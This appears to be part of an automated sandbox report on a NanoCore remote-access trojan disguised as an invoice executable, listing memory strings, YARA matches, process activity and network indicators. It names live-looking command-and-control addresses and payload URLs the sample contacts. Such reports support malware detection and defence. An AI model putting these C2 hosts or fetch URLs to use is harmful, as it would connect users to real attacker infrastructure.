      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb< source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: iertutil.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: msasn1.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdbQ8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb+8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdbA source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdbO8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: rawing.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: fwpuclnt.pdbW source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdb{{ source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: version.pdbE8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: psapi.pdbG source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbEIC) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbxl& source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: oleaut32.pdbs8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: winhttp.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb98 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: rtutils.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb? source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.1384536651.0000000000CC7000.00000004.00000001.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, AdvancedRun.exe, 00000004.00000002.1336631747.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000005.00000000.1334457908.000000000040C000.00000002.00020000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: WLDP.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: rawing.pdb&& source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clrjit.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529251324.00000000015E8000.00000004.00000020.sdmp
      Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: version.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wintrust.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: System.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ore.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: cryptsp.pdb8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: psapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb]8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb78 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: ws2_32.pdb5 source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: cldapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.1379876265.0000000000CD9000.00000004.00000001.sdmp
      Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: powrprof.pdbg8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: combase.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: System.Core.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb |I^ source: WerFault.exe, 00000016.00000002.1491750046.0000000004DDE000.00000004.00000001.sdmp
      Source: Binary string: System.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: edputil.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: crypt32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: 185.157.160.233
      Source: Malware configuration extractorURLs: annapro.linkpc.net
      Source: global trafficTCP traffic: 192.168.2.3:49759 -> 185.157.160.233:2212
      Source: global trafficTCP traffic: 192.168.2.3:49766 -> 105.112.98.239:2212
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: Joe Sandbox ViewIP Address: 185.157.160.233 185.157.160.233
      Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
      Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: global trafficHTTP traffic detected: GET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1Host: coroloboxorozor.com
      Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/75FE8DBFF9B09DE6205DD213CEB478DC.html
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/D8145E38A6AEE16C4C80E6936C9A6886.html
      Source: powershell.exe, 00000006.00000003.1450190829.0000000008D01000.00000004.00000001.sdmpString found in binary or memory: http://crl.Q
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
      Source: powershell.exe, 00000002.00000003.1426826006.00000000051CB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.1410135765.0000000005360000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000003.1426826006.00000000051CB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000003.1389202803.0000000007A12000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: AdvancedRun.exe, AdvancedRun.exe, 00000005.00000000.1334457908.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
      Source: powershell.exe, 00000002.00000003.1389202803.0000000007A12000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000003.1412011053.0000000005371000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
      Source: CasPol.exe, 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORY
      Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.52a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287989.exe
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D4AE98 NtSetInformationThread,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D4C7E8 NtSetInformationThread,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D456E0
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D4E398
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D4F0F8
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D30040
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D456D4
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D3285F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00500610
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0050E158
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_005671B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0056EE58
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_04F5E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_04F5E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_04F5BBD4
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236
